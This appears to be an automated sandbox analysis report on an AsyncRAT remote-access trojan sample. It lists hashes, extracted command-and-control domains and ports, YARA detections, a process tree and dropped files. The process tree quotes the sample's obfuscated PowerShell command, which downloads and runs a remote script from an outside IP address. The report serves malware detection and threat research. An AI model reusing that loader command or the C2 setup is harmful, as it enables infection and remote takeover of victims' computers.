Analysis
max time kernel: 142s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20231222-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-02-2024 20:58
Static task: static1
Behavioral task: behavioral1
Sample: 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe
Resource: win7-20231215-en
General
Target: 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe
Size: 155KB
MD5: a2be5a2407107605033f2bd305be2e40
SHA1: 0cc699e4c019627527777744903f75bc2494ef3a
SHA256: 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935
SHA512: ff211c693680df1ca81a7858dd647afc5cc0be093b985d9c3b20a1693bff069c260e66e2421b79e0711634baed2c6f12a1d905029e82e409c8368c0590bd9b6a
SSDEEP: 768:8fvdWST3xRbyApqHuDlOHTjXhDnyokke5dfED1ns7csFOyh1cccccccccccgccc8:UvdWSVRVDlOzjRzrksAOUOMv
Malware Config
Extracted
Family: asyncrat
Version: | Edit 3LOSH RAT
Botnet: test
C2:
  xfreddy2751.duckdns.org:6606
  xfreddy2751.duckdns.org:7707
  xfreddy2751.duckdns.org:8808
  darkstorm275991.ddns.net:6606
  darkstorm275991.ddns.net:7707
  darkstorm275991.ddns.net:8808
Mutex: AsyncMutex_6SI8OkPnk
Attributes:
  delay: 3
  install: false
  install_file: License.exe
  install_folder: %AppData%
Signatures

Detect ZGRat V1 (1 IoC)
  yara rule family_zgrat_v1 matched:
    behavioral2/memory/4208-66-0x000001E74C4B0000-0x000001E74C4CA000-memory.dmp

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs (2 IoCs)
  yara rule INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs matched:
    behavioral2/memory/5088-68-0x0000000000400000-0x0000000000416000-memory.dmp
    behavioral2/memory/4208-69-0x000001E74C520000-0x000001E74C530000-memory.dmp

Detects executables packed with ConfuserEx Mod (1 IoC)
  yara rule INDICATOR_EXE_Packed_ConfuserEx matched:
    behavioral2/memory/4208-66-0x000001E74C4B0000-0x000001E74C4CA000-memory.dmp

Detects file containing reversed ASEP Autorun registry keys (3 IoCs)
  yara rule INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse matched:
    behavioral2/memory/5088-68-0x0000000000400000-0x0000000000416000-memory.dmp
    behavioral2/memory/4208-69-0x000001E74C520000-0x000001E74C530000-memory.dmp
    behavioral2/memory/5088-74-0x0000000005320000-0x0000000005330000-memory.dmp

Blocklisted process makes network request (2 IoCs)
  flow 3: pid 4560 WScript.exe
  flow 14: pid 4944 powershell.exe

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
  Key value queried by WScript.exe: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation
  Key value queried by WScript.exe: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation
  Key value queried by 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation

Executes dropped EXE (1 IoC)
  pid 1796 CONSOLEAPP1.EXE

Suspicious use of SetThreadContext (1 IoC)
  PID 4208 powershell.exe set thread context of 5088 RegSvcs.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
  Key created by 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 4944 powershell.exe (2 entries)
  pid 4208 powershell.exe (4 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, pid 4944 powershell.exe
  Token: SeDebugPrivilege, pid 4208 powershell.exe
  Token: SeDebugPrivilege, pid 5088 RegSvcs.exe

Suspicious use of WriteProcessMemory (24 IoCs)
  PID 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe wrote to memory of 1796 CONSOLEAPP1.EXE (3 entries)
  PID 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe wrote to memory of 4560 WScript.exe (3 entries)
  PID 4560 WScript.exe wrote to memory of 4944 powershell.exe (3 entries)
  PID 2452 WScript.exe wrote to memory of 1008 cmd.exe (2 entries)
  PID 1008 cmd.exe wrote to memory of 4208 powershell.exe (2 entries)
  PID 4208 powershell.exe wrote to memory of 1876 RegSvcs.exe (3 entries)
  PID 4208 powershell.exe wrote to memory of 5088 RegSvcs.exe (8 entries)

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
    command line: "C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"
    - Executes dropped EXE

  C:\Windows\SysWOW64\WScript.exe
    command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PXDMLEPZSW.WSF"
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://51.195.251.9:222/BR.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WScript.exe
  command line: C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: 8109805611a11b1e1466debd6b616686
  SHA1: 397e1b1de73812033050727a957edc39cc9ad32c
  SHA256: 98bacaf69f25b0381aba14c88972260f68fcef962380e9bb76411db452c8691e
  SHA512: 09b8b04a175dba1aca800a77aa27f6a225513f233c7bec5da7cceee4ef3b5e10ff28b9b251d8e55fc60e1cc78895bbd4f7fdf9fa7dbb1f28aaf4046f747d98d9

C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
  Filesize: 4KB
  MD5: 3facc93eb70a073f208f90955fb055cb
  SHA1: 8f04cf5b9c9164f82b7e77034eee62396f6c5bf0
  SHA256: 608c73065d03ab7da0a0b8c8c3db3e073b2403a8d0249b9d684286f58e52dead
  SHA512: 269fb263dd7a2f383c2442a43e98435c4ee0767eab55c77ce5ff2e169089739e746f70208baaac2e4459076596a6afbf3fc8960d1ce9b8f46e91f7e462bd649c

C:\Users\Admin\AppData\Local\Temp\PXDMLEPZSW.WSF
  Filesize: 97KB
  MD5: a704439ce9c5fc9b342e52019c4315cd
  SHA1: fd846d13920c2d3b788f1e7c7d834ba208404c8a
  SHA256: bb144eb973c93e0c9b19c52acc40c264e2fcc01518f7a2504d1f11b442f336f9
  SHA512: e013ce483ce84bfee05f899fd2a317eb2930b41b4a3b14c4cc7efab9c69296580e9d2b2f05c8c55aff2e6cc5940e75f92f3fa3486a2b3e6d415be30d5be424e2

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ohuvpfls.aai.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\Conted.bat
  Filesize: 199B
  MD5: e70cce8b1110edb40612b5b14204f4b1
  SHA1: c4872dc920d20cac95d65cd156d3df1da4e5e2c8
  SHA256: e76c913a64800a5e756bfdacc103022bcb86e7f8477a8333387660166d161eba
  SHA512: 2a3b9fec13422465ee7b22745343ff5a0d3392a1185bdd239bf32d7df33a7722fab8cb71365889139eeb69aea8ea96c18317dd52863d841d2a3e75a0271a17c4

C:\Users\Public\Conted.ps1
  Filesize: 49KB
  MD5: 3506ad6ef276791f9b1b0e8de8c92927
  SHA1: f7bc123c6ccf50924ee91b403bdff9ebbfadddb3
  SHA256: 5aee3b292a4ce52e43219e4c2198230ce3d422cd54f3a642b754e617a12a3977
  SHA512: a670e6610eb20b1bfede64650a11605eadb3500d1b6e60f44a4a42f177eacb122b4254a1fd68b13b0d3254521607dab61eeb7b3edd2a95c0f6735237a3cdfc76

C:\Users\Public\Conted.vbs
  Filesize: 661B
  MD5: b5e6dbc17075ec5f697166a10970ae47
  SHA1: b858767affe1a38de4d191b3e56c0db0ae6f049a
  SHA256: 02e51e8b98e6eca20ee0869c44c62724cd287d70c6eed97bf13237feef9b436e
  SHA512: f3d8198381aa76a8b7de66d81d310488535aac256d68b60739b5921895a6f7836404672990debe8e9f0d43a42f27a78d58e889314b9c82291646679b8969c1c3
Memory dumps (Filesize):
  memory/1796-14-0x0000000000E40000-0x0000000000E48000-memory.dmp: 32KB
  memory/1796-15-0x00000000743C0000-0x0000000074B70000-memory.dmp: 7.7MB
  memory/1796-20-0x00000000743C0000-0x0000000074B70000-memory.dmp: 7.7MB
  memory/4208-66-0x000001E74C4B0000-0x000001E74C4CA000-memory.dmp: 104KB
  memory/4208-67-0x000001E74C520000-0x000001E74C530000-memory.dmp: 64KB
  memory/4208-64-0x000001E74C520000-0x000001E74C530000-memory.dmp: 64KB
  memory/4208-63-0x00007FFC3A3E0000-0x00007FFC3AEA1000-memory.dmp: 10.8MB
  memory/4208-69-0x000001E74C520000-0x000001E74C530000-memory.dmp: 64KB
  memory/4208-52-0x000001E74C460000-0x000001E74C482000-memory.dmp: 136KB
  memory/4208-73-0x00007FFC3A3E0000-0x00007FFC3AEA1000-memory.dmp: 10.8MB
  memory/4944-26-0x00000000054D0000-0x00000000054F2000-memory.dmp: 136KB
  memory/4944-27-0x0000000005DC0000-0x0000000005E26000-memory.dmp: 408KB
  memory/4944-46-0x0000000002E60000-0x0000000002E70000-memory.dmp: 64KB
  memory/4944-49-0x0000000072F20000-0x00000000736D0000-memory.dmp: 7.7MB
  memory/4944-41-0x0000000007CA0000-0x000000000831A000-memory.dmp: 6.5MB
  memory/4944-40-0x0000000006520000-0x000000000656C000-memory.dmp: 304KB
  memory/4944-39-0x0000000006470000-0x000000000648E000-memory.dmp: 120KB
  memory/4944-21-0x0000000002EB0000-0x0000000002EE6000-memory.dmp: 216KB
  memory/4944-38-0x0000000005FA0000-0x00000000062F4000-memory.dmp: 3.3MB
  memory/4944-42-0x0000000006A10000-0x0000000006A2A000-memory.dmp: 104KB
  memory/4944-28-0x0000000005E30000-0x0000000005E96000-memory.dmp: 408KB
  memory/4944-22-0x0000000072F20000-0x00000000736D0000-memory.dmp: 7.7MB
  memory/4944-25-0x0000000005570000-0x0000000005B98000-memory.dmp: 6.2MB
  memory/4944-24-0x0000000002E60000-0x0000000002E70000-memory.dmp: 64KB
  memory/4944-23-0x0000000002E60000-0x0000000002E70000-memory.dmp: 64KB
  memory/5088-72-0x0000000074A20000-0x00000000751D0000-memory.dmp: 7.7MB
  memory/5088-68-0x0000000000400000-0x0000000000416000-memory.dmp: 88KB
  memory/5088-74-0x0000000005320000-0x0000000005330000-memory.dmp: 64KB
  memory/5088-75-0x0000000005850000-0x00000000058EC000-memory.dmp: 624KB
  memory/5088-76-0x0000000005EA0000-0x0000000006444000-memory.dmp: 5.6MB